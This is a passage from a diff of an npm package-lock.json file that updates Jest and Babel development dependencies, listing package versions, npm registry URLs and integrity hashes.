"sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", + "node_modules/@types/node": { + "version": "20.4.1", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", + "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", + "dev": true + }, + "node_modules/@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", + "node_modules/@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "@types/yargs-parser": "*" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" + "color-convert": "^2.0.1" }, "engines": { - "node": ">=6.9.0" + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, + "license": "MIT", "dependencies": { - "color-convert": "^1.9.0" + "fill-range": "^7.1.1" }, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" }, "engines": { - "node": ">=4" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dev": true, "dependencies": { - "color-name": "1.1.3" + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dev": true }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true, "engines": { - "node": ">=0.8.0" + "node": ">=8" } }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, + "license": "MIT", + "dependencies": { + "to-regex-range": "^5.0.1" + }, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">=0.12.0" } }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "MIT" + }, + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8.6" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "ISC" }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "engines": { + "node": ">=8.6" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", + "node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "node_modules/stack-utils": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", + "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "escape-string-regexp": "^2.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=10" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "has-flag": "^4.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "is-number": "^7.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8.0" } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + } + }, + "dependencies": { + "@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "requires": { + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" } }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true + }, + "@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", + "dev": true + }, + "@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", + "dev": true }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "requires": { + "@types/node": "*", + "jest-regex-util": "30.0.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "dependencies": { + "jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", + "dev": true + } } }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || 